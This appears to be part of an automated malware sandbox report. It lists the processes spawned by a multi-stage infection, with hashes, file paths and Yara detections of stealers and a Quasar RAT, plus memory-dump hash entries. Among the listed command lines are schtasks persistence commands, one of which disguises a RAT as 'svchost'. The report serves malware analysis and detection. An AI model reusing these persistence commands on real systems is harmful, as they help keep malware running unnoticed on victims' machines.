                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                                                        Imagebase:0x200000
                                                                                                                                                                                                                                        File size:43'016 bytes
                                                                                                                                                                                                                                        MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.2811418680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000014.00000002.2811418680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:01:07:05
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff6c3320000
                                                                                                                                                                                                                                        File size:1'743'872 bytes
                                                                                                                                                                                                                                        MD5 hash:4640FAEAFA95CE219C649E9F5CBFFD75
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:01:07:12
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe"
                                                                                                                                                                                                                                        Imagebase:0x870000
                                                                                                                                                                                                                                        File size:424'960 bytes
                                                                                                                                                                                                                                        MD5 hash:07101CAC5B9477BA636CD8CA7B9932CB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.2795620246.0000000000871000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.2774604502.0000000000871000.00000020.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:01:07:14
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                                                                                                                                                                                                                                        Imagebase:0xe00000
                                                                                                                                                                                                                                        File size:424'960 bytes
                                                                                                                                                                                                                                        MD5 hash:07101CAC5B9477BA636CD8CA7B9932CB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000000.2792505057.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.4455767208.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:01:08:00
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        Imagebase:0xe00000
                                                                                                                                                                                                                                        File size:424'960 bytes
                                                                                                                                                                                                                                        MD5 hash:07101CAC5B9477BA636CD8CA7B9932CB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000002.3260194667.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000018.00000000.3249458796.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:01:08:52
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe"
                                                                                                                                                                                                                                        Imagebase:0xec0000
                                                                                                                                                                                                                                        File size:304'128 bytes
                                                                                                                                                                                                                                        MD5 hash:A20FC3377C07AA683A47397F9F5FF355
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000000.3774634677.0000000000EC2000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:01:09:00
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        Imagebase:0xe00000
                                                                                                                                                                                                                                        File size:424'960 bytes
                                                                                                                                                                                                                                        MD5 hash:07101CAC5B9477BA636CD8CA7B9932CB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.3861449673.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000000.3849994852.0000000000E01000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:01:09:01
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000241001\see.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000241001\see.exe"
                                                                                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                                                                                        File size:550'912 bytes
                                                                                                                                                                                                                                        MD5 hash:CD65AA14F5B3B1C266D82BA09B42FF86
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:01:09:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe"
                                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                                        File size:922'112 bytes
                                                                                                                                                                                                                                        MD5 hash:CD2DD54E31B33E1FEDECED94367CD942
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:01:09:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:01:09:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:01:09:05
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:922'112 bytes
                                                                                                                                                                                                                                        MD5 hash:CD2DD54E31B33E1FEDECED94367CD942
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:01:09:07
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:922'112 bytes
                                                                                                                                                                                                                                        MD5 hash:CD2DD54E31B33E1FEDECED94367CD942
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:01:09:14
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:922'112 bytes
                                                                                                                                                                                                                                        MD5 hash:CD2DD54E31B33E1FEDECED94367CD942
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:01:09:14
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:01:09:14
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:01:09:16
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                        Imagebase:0xb40000
                                                                                                                                                                                                                                        File size:45'984 bytes
                                                                                                                                                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:01:09:19
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                                                                                                                                                                                                                                        Imagebase:0xf60000
                                                                                                                                                                                                                                        File size:2'981'888 bytes
                                                                                                                                                                                                                                        MD5 hash:E634EE541D4D4911DABDDAC835517559
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:01:09:22
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                                                                                                                                                                                                                        Imagebase:0x940000
                                                                                                                                                                                                                                        File size:922'112 bytes
                                                                                                                                                                                                                                        MD5 hash:CD2DD54E31B33E1FEDECED94367CD942
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:01:09:26
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:01:09:26
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:01:09:26
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe"
                                                                                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                                                                                        File size:2'981'888 bytes
                                                                                                                                                                                                                                        MD5 hash:E634EE541D4D4911DABDDAC835517559
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:01:09:33
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:01:09:33
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Reset < >
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d6a024b9fb0e9af37293a476db68fc9f5cb57cb0010da63024b859faa75c8808
                                                                                                                                                                                                                                          • Instruction ID: 09a3cbdbc3c930215d5dacab9cc62dcd52e083e024f9474c2e71d44599beb2a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a024b9fb0e9af37293a476db68fc9f5cb57cb0010da63024b859faa75c8808
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0A4BF14E915BEE342C0857E3AAFE27EFE6C17307308456F807C9901D6A099595271
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8ab085e280f6be0ef629848312fbd19326a932ac596275e30da1d9433151fae6
                                                                                                                                                                                                                                          • Instruction ID: d9296eaab75e79fc427b9b98d9492d7e2926a5e3efd6f078256a07c4272de9bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ab085e280f6be0ef629848312fbd19326a932ac596275e30da1d9433151fae6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 152137EF14E511BDE702C5547A6AAFE3BAFE6C2630335886AF842C6506E2558C4A8271
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 025d4aaa5806211451a2e0c1be166a012f8cc3f8f3b6057cee72d3d876beccbd
                                                                                                                                                                                                                                          • Instruction ID: 7a66f03ddd8b50ac8dfdd4d662262f79b3710dcbb13dd54c0d44b0bb1a267771
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 025d4aaa5806211451a2e0c1be166a012f8cc3f8f3b6057cee72d3d876beccbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701B9BF14E915BDE342C5453A3EAFE27DFD1C16307348476F807C6901D29499595271
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 678273028eef5a3aea7308e21ff6b512d96f194cbfea310746a975bc2d0cf395
                                                                                                                                                                                                                                          • Instruction ID: 51529a5c2f3b2f158a0244d99a93ce8424cbed16b4a85a59a158017f77629ce8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678273028eef5a3aea7308e21ff6b512d96f194cbfea310746a975bc2d0cf395
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A01F1BF14EA10AEE391C5857A2E6FF33EFF6D2330730842AF802C5901E6A599495271
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 961784b740250666a4b81ed16c293fd7d37822e02d40077a635ff077bd2dbe32
                                                                                                                                                                                                                                          • Instruction ID: 21d0d1496b04a29127eaa3dc15b1078dc83cb2353096bc93d4d34da8e2ced9b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 961784b740250666a4b81ed16c293fd7d37822e02d40077a635ff077bd2dbe32
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F0F0BF14E910BEE342C0857A3AAFE27EFE2D0330770C417F807C5901D2A09A595232
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2045877967.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5030000_mlk3kK6uLZ.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
